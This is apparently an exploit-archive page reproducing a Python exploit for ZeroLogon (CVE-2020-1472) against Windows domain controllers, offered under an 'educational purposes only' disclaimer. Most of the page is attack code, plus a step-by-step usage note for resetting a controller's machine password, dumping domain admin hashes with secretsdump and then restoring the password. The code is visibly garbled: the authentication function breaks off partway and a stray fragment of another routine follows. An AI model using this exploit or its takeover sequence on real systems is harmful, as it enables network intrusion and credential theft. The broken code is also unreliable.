Zerologon netlogon elevation of privilege Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-11-18 |
Type : remote |
Platform : windows
This exploit / vulnerability Zerologon netlogon elevation of privilege is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: ZeroLogon - Netlogon Elevation of Privilege
# Date: 2020-10-04
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2
# Tested on: Microsoft Windows Server 2016 Standard x64
# CVE : CVE-2020-1472
# Credit to: Tom Tervoort for discovery and Dirk-Janm for Impacket code
# Sources: https://www.secura.com/pathtoimg.php?id=2055
# Requirements: python3 and impacket 0.9.21+ (tested using this version)
#!/usr/bin/env python3
import hmac, hashlib, struct, sys, socket, time, argparse, logging, codecs
from binascii import hexlify, unhexlify
from subprocess import check_call
from impacket.dcerpc.v5.dtypes import NULL, MAXIMUM_ALLOWED
from impacket.dcerpc.v5 import nrpc, epm, transport
from impacket import crypto, version
from impacket.examples import logger
from Cryptodome.Cipher import AES
from struct import pack, unpack
from impacket.dcerpc.v5.rpcrt import DCERPCException
def authenticate(self):
self.logInfo(
'checking target, attempting to authenticate %d max
attempts' % self.max
)
for attempt in range(0, self.max):
self.logInfo('attempt %d' % attempt)
self.serverReqChallenge()
self.serverAuthenticate()
if self.dce is not None:
break
if self.dce:
return True
else:
self.logError('failed to authenticate')
creds=self.ComputeNetlogonCredentialAES(self.clientStoredCredential)
)
self.clearNewPasswordBlob = self.ComputeNetlogonCredentialAES(
self.encodePassword(self.password)
)
reset = self.serverPasswordSet()
if reset['ErrorCode'] == 0:
self.logInfo('successfully restored password')
else:
self.logError('failed to restore password')
except Exception as ex:
self.logError(ex)
return self
if __name__ == '__main__':
info = """
NOTE - Exploitation will break the DC until restored, recommended guidelines:
1. Check the DC - usually ~300 attempts, use the NETBIOS name not the FQDN:
cve-2020-1472.py -do check -target <NETBIOS NAME> -ip <IP>
2. Exploit the DC - this will break the DC until restored:
cve-2020-1472.py -do exploit <NETBIOS NAME> -ip <IP>
3. Dump the DC - for the DA hashes, this will not contain the
machine hex-pass:
secretsdump.py -just-dc -no-pass <NETBIOS NAME>\$@<IP>
4. Dump the DC again - use the DA hash to get the machines hex-pass:
secretsdump.py -no-pass -hashes <LMHASH>:<NTHASH> <DOMAIN>/<ADMIN>@<IP>
5. Restore target - this fixes the DC:
cve-2020-1472.py -do restore -target <NETBIOS NAME> -ip <IP>
-hex <HEXPASS>
"""
parser = argparse.ArgumentParser(
description='CVE-2020-1472 ZeroLogon Exploit - Netlogon
Elevation of Privilege',
add_help=True
)
try:
parser.add_argument('-do', default='check', action='store',
help='What to do (default check):
[check|restore|exploit]')
parser.add_argument('-target', action='store',
help='NETBIOS name of target DC (not the FQDN)')
parser.add_argument('-ip', action='store',
help='IP address of target DC')
parser.add_argument('-password', default='', action='store',
help='The plaintext password to use to
reset the DC')
parser.add_argument('-hex', default='', action='store',
help='The hex password to use to restore
the DC (recommended)')
parser.add_argument('-max', default=2000, action='store',
help='Max attempts to authenticate with
the DC (usually ~300 or less)')
if len(sys.argv) < 3:
parser.print_help()
print(info)
sys.exit(1)
options = parser.parse_args()